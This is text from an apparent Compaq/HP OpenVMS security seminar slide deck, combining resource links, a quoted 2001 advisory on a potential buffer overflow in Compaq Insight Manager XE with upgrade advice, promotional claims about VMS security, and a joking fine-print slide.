http://cve.mitre.org/cve/ Security advisories
http://www.support.compaq.com/patches/mailing-list.shtml
http://pulhas.org/xploits/ System Holes since 1996;-)
http://manson.vistech.net/ht_root/Hack-VMS-faq Doc cypher VMS FAQ
filename\location
Patch mailing listhttp://www.support.compaq.com/patches/mailing-list.shtml
Subject: [Advisory] SSRT0766 Potential Buffer Overflow for Compaq Insight Manager XE (only)Date: Mon, 29 Oct 2001 15:28:54 -0700From: "Boren, Rich (SSRT)" <[email protected]>Reply-To: "Security Patch Mailing List" <[email protected]>To: "Security Patch Mailing List" <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1
NO RESTRICTION FOR DISTRIBUTION PROVIDED THE ADVISORY REMAINS INTACT
TITLE: (SSRT0766) Potential Security Vulnerability Compaq Insight Manager XE Software
SOURCE: Software Security Response Team U.S. Compaq Computer Corporation *Reference SSRT0766* * x-ref SSRT0758*
Date: October 29, 2001
(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.
PATCHES SUPERSEDED BY THIS ADVISORY: None
"Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the----
Summary
Compaq Management Software products undergo rigorous qualityassurance processes to ensure that they meet the highestpossible standards for security, reliability and usability.In line with this commitment, Compaq recently uncovered apotential buffer overflow security vulnerability in itsSNMP and DMI support within Compaq Insight Manager XE.This vulnerability has the potential to enable unauthorizedusers to execute code at an administrator level through theexploitation of a buffer overflow. Compaq has addressedthis issue with version 2.1c of Compaq Insight Manager XEand the recently announced Compaq Insight Manager 7.Compaq strongly recommends that customers upgrade toversion 2.1c or Compaq Insight Manager 7.
Compaq strongly recommends that management agents and CompaqInsight Manger XE be deployed only on private networks and notused on the open Internet or on systems outside the bounds ofthe firewall. The implementation of sound security practices,which includes disabling external access to Compaq managementports, should help protect customers from external maliciousattacks. Compaq also recommends that strong password standardsare used and that passwords are changed regularly.
filename\location
OpenVMS Security Seminar
QA&
filename\location
VMS when computer failure is not an option!
Mitnick can’t hack VMS
Bin Laden can’t take out VMS
And Not One of 70,000+ the viruses ever to roam the internet has ever infected or corrupted an OpenVMS systems.
That’s why after 25 years, companies still use and Trust OpenVMS.
And now it’s your move for computer security…
filename\location
filename\location
The Fine Print
Copyright 2002 Hewlett Packard Corporation All rights reserved.
While Compaq believes the information included in this presentation is correct as of the date produced, it is subject to change without notice.
All trademarks and registered trademarks are the property of their respective holders. Itanium™ and IA-64™ are trademarks of Intel.
Presentation void where taxed or prohibited by law.
Recommended for technical and engineering ranks ages 12 and up. Ask for special pointy-haired-boss toy.
Do not taunt Happy Fun Ball.
Known Glaze-on hazard, please keep this and all other similar presentations away from known-sensitive members of engineering, marketing and management.
filename\location